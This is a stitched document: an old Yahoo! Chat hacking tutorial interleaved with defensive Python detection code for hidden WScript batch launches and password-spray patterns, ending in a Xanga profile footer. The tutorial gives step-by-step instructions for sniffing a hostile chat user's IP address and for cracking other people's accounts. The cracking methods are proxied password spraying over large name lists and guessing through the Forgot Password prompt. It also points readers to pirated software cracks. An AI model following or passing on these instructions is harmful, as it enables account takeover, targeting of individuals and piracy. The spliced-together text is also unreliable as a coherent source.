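    "startup_batch_launch": startup_batch_launch,
    "script_host_with_batch_arg": script_host_with_batch_arg,
    "wscript_hidden_batch": wscript_hidden_batch,
}


def scan(events):
    """Return (event_index, rule_name) for every event that matches a rule."""
    return [(i, name) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for i, name in scan(SAMPLE_EVENTS):
        print(f"event {i}: {name}: {SAMPLE_EVENTS[i]['CommandLine']}")
```

The third rule is the useful one for the hidden-window trick: the window style passed to WScript.Shell.Run hides the console from the user, but it does not hide the cmd.exe child from the process log.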

  • Section 1: The Introduction
    ----------------------------

    Greetings, and welcome to the second installment of my Yahoo! Chat Tips
    & Tricks tutorial. It's been a little over a year since I wrote the
    original Yahoo! Chat Tips & Tricks, and a few things have changed since
    I wrote the original. Therefore, though it wasn't exactly one of my
    proudest works, I figured it would only be right to put together a
    second installment. So, as always, sit back, read, and learn...



    Section 2: IP Grabbing (revisited)
    -----------------------------------

All right, well in the first installment, I started off the tutorial
    with a discussion on common techniques of IP grabbing (obtaining the
    IP address of a user on Yahoo! Chat), so I felt it only fitting to
    come back to this topic and add a couple of techniques that I left out.
    In the original tutorial, I discussed three common techniques used for
    obtaining the IP address of another user. The problem with the
    techniques originally described is that they depend on somewhat
    personal contact with the intended target in order to retrieve these
    IP addresses. Well, what if the intended target is someone who hates
    us? Someone who would not allow any such contact needed to obtain their
    IP address? Do we just forget about it then? No, we find alternative
    methods.

    For this technique what you will need to do is go to www.ethereal.com
    and download the latest version of Ethereal, and also install WinPcap
    if you have not installed it before. Do you have both downloaded and
    installed? Good, now some of you may be looking at this and wondering
    "Ok, what the hell did I just download?". Ethereal is a packet sniffer,
    and is used to capture and analyze the packets that are being sent and
    received on your computer.

    Now that you have all this installed, what you will do is open up your
    chat client (Y!M, YahElite, Y!MLite, whatever), and then load up
    Ethereal. Before you start I will need you to go into the filter
    settings and tell the packet sniffer to only capture YMSG packets.
    Otherwise, you will have a huge list of captured packets that aren't
    even related to the service you are targeting. So have you done that?
    Good, now send a voice conference invite to the target user, and set
    Ethereal to start sniffing. What you will be doing now is waiting for
    the message to appear as to how the user responded. It doesn't matter
    whether he/she accepts or declines, you will still get the IP address.

    Once you have received the response message from the user, stop
    Ethereal and look through the packets listed for the response sent to
    your computer. Though you have set filters to capture only YMSG
    packets, you will still have many packets to look through. This is a
    rather tedious task, but is necessary. Once you have located the
    response packet, analyze the header of the packet to find its source
    address. The source address of this response packet should be the IP
    address of the other user, but just in case, load up a tool like Sam
    Spade and use it to find out the host name of this address, since the
    Yahoo! server that transmitted this packet to you will also be listed
    within the header of the packet. If you have done everything correctly
    then you should now have the IP address of the other user.

    If all this seems hard and tedious for you, then you can look on
    www.custom-owns.com for a tool called IPGetter, created by a programmer
    who goes under the name markus. It's a program that supposedly does all
    this work for you, but I have not tested it out myself, so you would
    have to try it out yourself. Again, the best part about this trick is
    that whether they accept or decline the conference invite, you still
    have the IP address. So it's a win-win situation. Enjoy. =)


    Section 3: Cracking Illegal Accounts
    -------------------------------------

Well this is very far from a new topic, but since there is no tutorial
    that I know of that accurately and coherently describes the steps to
    cracking these types of accounts, I decided to explain these steps to
    you myself. For those of you who don't know for some odd reason,
    illegal accounts are Yahoo! accounts that were created before Yahoo!
    set standards for creating screen names. Before 1999, users were
    allowed to use pretty much any character they wanted to, in any order
    they wanted to, to create screen names. This made for some fairly
    interesting looking accounts. Then around 1999 or so, Yahoo! patched up
    this issue and set stricter standards for creating screen names, since
    they said that these old names were interfering with their email
    service. So since then illegal accounts have become rarer, and thus
    more valuable to a Yahoo! user. Today this activity is not quite as
    common as it used to be, though it is still dominant among a small
    circle that usually trolls around Bitchin (Computers & Internet/User
    Rooms) to show off their latest cracks (primarily since cracking these
    types of names is a tad bit harder than it used to be). So what is the
    point of this activity? Well the primary reason is just to have a cool
    looking account to show off around the chat rooms, though their rarity
    can also make them easily auctioned or sold (in case you need some
    extra revenue, and who doesn't).

    So let's get started, shall we. For this task we will need an
    assortment of tools. First, what we will need is of course a list of
    illegal accounts to attempt to crack. There is a seemingly endless
    flood of Yahoo!-related sites out there to get these tools from, but
    for this tutorial I will be concentrating on one specific
    Yahoo!-related site, since it's fairly reliable, and the programs
    listed on the site usually work. So what we will be first looking for
    is a name generator/scanner. You can either get a name generator and a
    name scanner separately, or you can download a program that does both.
    Generation XXX is a great example of such a program, and can be found
    at www.custom-owns.com. Once we have this downloaded we will want to
    attempt to make a fairly large list of potential names that we will be
    interested in cracking. The layout is fairly simple to understand, so I
    won't bother giving you step-by-step instructions on working one of
    these programs, but I will offer you some suggestions.

    First and probably most importantly, your name list needs to be a
    fairly large size. I'm not talking about a couple of hundred, or even a
    couple of thousand, but at least over 10,000 names. The reason is that
    in the cracking process we are going to be using a distributed cracking
    attempt, trying each password against our list of accounts of interest,
    and the more accounts we have on our list, the better chance we have of
    cracking one. Another suggestion, if you are interested in getting some
    nice looking accounts, is to not only scan for words of interest, but
    also certain special characters. Try scanning for accounts with certain
    smileys in the names, like ":)" or ">:)", as well as certain numbers
    and such like "4:20" or "666". Your only limit is your imagination, and
    it's strongly suggested to use your imagination when scanning for these
    accounts. You may find this step to be somewhat of a tedious process,
    but remember, the more names you have in your list, the better your
    chances are of getting a match. Don't expect instant results.

    Now that we hopefully have a fairly large name list, we are going to
    want a list of proxy servers to use in our attempt. For this what I
    will ask you to do is go to www.proxyblind.org and grab all the proxy
    servers on their list. Recently they have stopped visitors from simply
    copying and pasting the proxy servers listed, but you can easily get
    around this by saving the web page onto your desktop (usually it's
    File/Save As). Then open up Notepad (Start/Run/notepad), and open the
    .html document that has been saved on your computer. Then scroll down
    the source, and you should see the listed proxies within the source.
    Now you can simply copy and paste this list into a new text document,
    and save. So is that it? No, most of the proxies listed are disabled
    almost immediately after they are posted, because of unusually frequent
    use (which can slow down Internet usage on the network hosting the
    proxy server). So what we will do now is go to google.com and search
    for "aatools download". The top sites resulting from this search should
    be the download pages for this tool, so we will go to these sites and
    download AATools. Once you have downloaded this tool, you will probably
    want to get a crack for this program, since it's only shareware, and a
    lot of features are disabled until the program is registered (like
    being able to scan the ENTIRE proxy list). For this we can go to
    www.crackspider.net and search for a crack for this program. You will
    want to check out the "About" tab within AATools to get the exact build
    of the software you have, then search for the full name of the program,
    including the build, in the search tab to find a crack for it. Once you
    have done this, just open up AATools, and go to Proxy Checker. Then
    simply load up the proxy list, and scan. Then save the active proxies
    found in the proxy list, and we are done with this step.

    Now what we will need are some password lists. On the custom-owns site,
    you should be able to find several password lists, including a .zip
    file containing an assortment of different word lists that you can use.
    Now that we have all this, we can finally get the cracker that we will
    use to crack these names. This is really your choice, and there are
    plenty to choose from. Just make sure that the cracker you use has
    proxy options. One thing you will need to do, since programmers who
    concentrate their work around Yahoo! seem to be a little less than
    perfect, is first give your cracker a field test before you actually
    put it to work. That way you don't end up wasting your time running a
    cracker that doesn't work. For this just create two different .txt
    files. Set one as a name list, and one as a word list. In the name list
    you will put in an account you own, and perhaps at least 5 other random
    names, like this...

    some_random_account1
    some_random_account2
    some_random_account3
    your_account_here
    some_random_account4
    some_random_account5

    Then of course save it as test_namelist.txt or something like that. Then
    open up notepad again and create a test word list, for example...

    somerandompass
    anotherrandompass
    anotherfakepass
    yourpasswordhere
    fakepass
    falsepass

Then of course, once again, save this as test_passlist.txt. Then simply
    load up your cracker, load up these two lists in their proper places,
    put in your proxies, and let her rip. If the cracker goes through this
    list and doesn't match your_account_here with yourpasswordhere, then
    you will delete this cracker and try another one. Make sure to set how
    many sockets are used before you even try testing, since how many
    sockets you set the program to use can greatly increase or decrease its
    accuracy (you should see a tab on the program somewhere that says
    "Sockets"). If you are on dialup then probably the best setting is
    around 10 sockets, and if you are on cable or DSL then you should do
    just fine setting your sockets at somewhere around 30. I'd like to note
    that it's hard to find a cracker that works well with dialup, so if you
    are on this type of connection, don't give up hope. Just know that it's
    going to take you a little longer to find a reliable cracker.

    So now that we have put together our name list, our proxy list, our
    pass list, and hopefully found a working cracker, just load all these
    up and start the cracker. Please take note that there are no instant
    results to this type of activity. It will take a lot of time, and
    depending on what kind of person you are, maybe a good bit of your
    patience. Just remember to keep your cool, and you should be ok. If you
    don't get a match the first try, don't worry. Just load up a different
    word list, gather up some new proxies, and take another whack at it.

    You can also try other ways of obtaining access to these types of
    accounts if you like. Another good technique for obtaining illegal
    accounts is info cracking. In case you didn't read my "How to Break
    Into Email Accounts" tutorial to get information on this type of
    cracking, info cracking is the process of breaking through the "Forgot
    My Password" prompt in order to gain access to the account. If you are
    targeting a specific illegal account that seems to strike your fancy,
    then you can look on the profile of the account for information that
    might help you with getting through this prompt. If that doesn't work
    out for you, then you can use an info cracking tool to scan your name
    list to attempt to crack through the first page of the "Forgot My
    Password" prompt. LBC (List Birthday Cracker) and Info-It are examples
    of tools you can use for this purpose. Then once you have found a
    match, you can look on the account and put in this information to get
    to the secret question. This has somewhat of an advantage over trying
    to crack the password, since usually the answer to a secret question is
    much easier to guess than the password to an account. There may or may
    not be a cracker for this prompt (I know there used to be one, but I'm
    not sure if it still works or not), but if you are willing to put in
    the time, then with a little imagination, it shouldn't be a problem to
    manually attempt to crack through this page.

    A helpful hint for you, if you do start successfully cracking different
    illegal accounts, is to not trade with anyone unless you know them
    personally. You will most likely get a lot of offers to trade, but an
    alarming majority of the people who will be interested in trading with
    you are "rippers", who will simply go in, change the password, and take
    the account for themselves without giving you anything in return. So be
    wary of these types. Anyways, that concludes it for this section. Just
    remember to be cool, keep your patience, and you should do just fine.
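The attack this section describes is, from the service operator's side, a password spray: one guess per account across a very large name list, routed through many proxies so that no single account and no single source ever trips a simple lockout. The following Python is an added example (not part of the tutorial) of the detection logic that catches that shape in authentication logs; the log line layout and the sample log are constructed, not taken from any real Yahoo! system.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

EPOCH = datetime(1970, 1, 1)
# Assumed line layout (constructed): "<iso-timestamp> <source-ip> login <account> OK|FAIL"
LINE_RE = re.compile(r"^(\S+) (\S+) login (\S+) (OK|FAIL)$")


def build_sample_log():
    """Constructed sample: 30 different accounts each tried once (FAIL) from six
    proxy addresses within 90 seconds, then a real user who mistypes twice and
    succeeds, then one account hit five times (ordinary single-account brute force)."""
    base = datetime(2007, 10, 25, 10, 0, 0)
    lines = []
    for i in range(30):  # the spray: one guess per account, rotating proxies
        ts = base + timedelta(seconds=3 * i)
        lines.append(f"{ts.isoformat()} 198.51.100.{i % 6 + 1} login name_{i:04d} FAIL")
    for k, res in enumerate(("FAIL", "FAIL", "OK")):  # legitimate typo, then success
        ts = base + timedelta(minutes=20, seconds=10 * k)
        lines.append(f"{ts.isoformat()} 192.0.2.7 login alice {res}")
    for k in range(5):  # brute force on one account: per-account lockout's job
        ts = base + timedelta(minutes=30, seconds=5 * k)
        lines.append(f"{ts.isoformat()} 192.0.2.9 login bob FAIL")
    return lines


def parse(lines):
    """Return (timestamp, ip, account, result) tuples; malformed lines are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            ts, ip, acct, result = m.groups()
            events.append((datetime.fromisoformat(ts), ip, acct, result))
    return events


def find_sprays(events, window_s=300, min_accounts=20, max_per_account=2):
    """Bucket FAIL events into fixed windows and flag a window in which many
    distinct accounts fail while no single account fails more than
    max_per_account times: wide across accounts, shallow per account, which
    is exactly the pattern a per-account lockout threshold never sees."""
    buckets = defaultdict(list)
    for ts, ip, acct, result in events:
        if result == "FAIL":
            buckets[int((ts - EPOCH).total_seconds()) // window_s].append((ip, acct))
    alerts = []
    for b in sorted(buckets):
        per_account = Counter(acct for _, acct in buckets[b])
        if len(per_account) >= min_accounts and max(per_account.values()) <= max_per_account:
            alerts.append({
                "window_start": EPOCH + timedelta(seconds=b * window_s),
                "accounts": len(per_account),
                "sources": len({ip for ip, _ in buckets[b]}),
                "failures": sum(per_account.values()),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_sprays(parse(build_sample_log())):
        print(f"{alert['window_start']}: {alert['failures']} failures across "
              f"{alert['accounts']} accounts from {alert['sources']} sources")
```

The alice and bob entries are there to show what the rule deliberately ignores: a couple of typos, and a repeated attack on one account, are handled by per-account limits, while the spray is only visible when failures are counted across accounts.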


    Section 4: Creating Dot Names
    ------------------------------

Of course, as you may know, you are normally not allowed on Yahoo! to
    create names with a "." in the name. This would lead you of course to
    believe that the only way to obtain such a name is to load up a cracker
    and attempt to break into one. Luckily for you, at least for the time
    being, there is an easier way. In case you don't understand anything
    about the Chinese language, I will offer a short explanation for you
    (you will understand why in a minute). In this language, and certain
    similar languages, surnames are appended to the name of the person you
    are addressing to show respect for his/her sex, status, or position.
    Therefore, surnames for Chinese users are also allowed to be appended
    to Yahoo! screen names. These surnames are appended to the name via a
    ".", and at this point you should see where I am going with this. So
    what you will do to create your own dot name is go to the following
    url...

    https://reg.cn.yahoo.com/cnreg/cnreg_first

    When you go to this site you will see a login page written in standard
    Chinese, which you will probably not understand, so I will briefly
    describe the steps so that you can create your own accounts with the
    language barrier. You will first off see a field that looks something
    like this....

    [            ]@yahoo.com.cn

This is where you will want to type the name that you are interested in
    having. Then below it you will see a bar with a series of tabs from
    A-F to X-Z. Upon clicking on one of these tabs you will see a list of
    possible surnames to append to your screen name. Let's say that in the
    field above we put in "nirvana"; then if we clicked on the A-F tab, we
    could select a surname like "fan". Once you have clicked this surname
    you should notice that the name listed above has changed to
    "nirvana.fan". Now we will simply scroll down and click the blue button
    at the bottom. If the name is taken then it will take us back to the
    beginning to choose another name; if not, then we should now be at the
    registration form.

    The first two fields below our selected screen name will be the
    password fields. So of course in these two fields we will simply type
    in the password that we want for the chosen account. Below this will be
    the secret question, so just choose a random question, and in the field
    below it type in a random answer to this question. Then of course below
    that is your birthday, which needs no explanation. Below that you will
    see two smaller fields side by side. This of course is your first and
    last name, so go ahead and put that information in. Then in the field
    below it on the left side is the zip code. In this field just type in
    any 6 digit number, for example "111111". The field beside it is your
    sex, so just choose the top if you're male, bottom if you're female.
    Then of course in the field below it type in the number that you see in
    the picture below and click on the blue button at the bottom of the
    form, and there you go. Now you have your very own dot name.

    Please take note that this method is not exactly secret information;
    most people have heard of the method, and many, as you will see, have
    already created their own dot names. So don't try to throw it around
    like it's an illegal account.


    Section 5: Conclusion
    ----------------------

Well that concludes it for yet another tutorial written by yours
    truly. If I feel the need to, I may add yet another installment to this
    tutorial sometime in the future, but don't expect it any time soon.
    Still, hope you enjoyed the tutorial. Until next time...


    Note: If you have any questions or comments and feel the need to reach
    me then you can do so at protonigg3r@yahoo.com and I will try to get
    back with you as soon as possible.

joseph_tabangay

  • Visit joseph_tabangay's Xanga Site
    • Name: joseph
    • Gender: Male
    • Member Since: 10/24/2007
